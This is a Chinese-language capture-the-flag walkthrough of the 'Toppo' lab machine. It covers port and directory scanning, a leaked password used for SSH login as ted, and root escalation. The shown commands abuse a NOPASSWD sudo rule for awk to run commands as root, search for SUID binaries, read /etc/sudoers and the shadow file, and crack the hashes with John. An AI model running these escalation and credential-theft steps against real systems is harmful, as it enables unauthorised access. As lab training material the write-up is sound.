nmap全端口扫
用msf的search一下相关版本的漏洞
没找到相关漏洞,直接从web端入手
Web渗透
Dir爆目录
data:image/s3,"s3://crabby-images/d3e7c/d3e7c4485ed69ba4430e10acd9a3de72c5b79643" alt=""
可疑目录打开:
http://192.168.8.123/admin/notes.txt
data:image/s3,"s3://crabby-images/ea3d6/ea3d640002b9e3aeaf93923f05b8f16f9ef2c3f9" alt=""
密码:12345ted123
扫了目录,没发现web有登陆界面
想必是ssh登陆
SSH登录
猜测用户名是:ted (爬取web页面,发现ted)
密码:12345ted123
data:image/s3,"s3://crabby-images/9d60e/9d60e924e796570c8f63d2f0ea823faf21e69c15" alt=""
data:image/s3,"s3://crabby-images/b7e8b/b7e8b3d1e995d76127d6321b3cb68bc67bf29ab6" alt=""
提权:
方法一:sudoers
ted@Toppo:/$ cat /etc/sudoers
ted ALL=(ALL) NOPASSWD: /usr/bin/awk
ted@Toppo:/$ awk 'BEGIN{system("whoami")}'
root
ted@Toppo:/$ awk 'BEGIN {system("ls/root")}'
flag.txt
ted@Toppo:/$ awk 'BEGIN {system("cat/root/flag.txt")}'
Congratulations ! there is your flag :0wnedlab{p4ssi0n_c0me_with_pract1ce}
data:image/s3,"s3://crabby-images/3232d/3232d3689e54ff03431b1a75be967216b258ddc7" alt=""
方法二:suid提权
下面的命令可以发现所有的系统中运行的SUID可执行文件
find / -userroot -perm -4000 -print 2>/dev/null
data:image/s3,"s3://crabby-images/f9dd5/f9dd5bdaeac2dc0af0aed351c065109bb6169ef3" alt=""
运行python
data:image/s3,"s3://crabby-images/c105c/c105cd4018b8c731e31f0dc88c1057cdab9494dd" alt=""
拿到flag:
flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}
破解密码
用awk命令全局搜shadow文件
John破解shadow
data:image/s3,"s3://crabby-images/c0e01/c0e0123a27370d2bb5f897f09469c1482d08f1ca" alt=""
密码:test123
可以直接登录主机
靶机下载地址:
链接:https://pan.baidu.com/s/1E_JzrrKVcTPobj4acIgKYA
提取码:u909
网友评论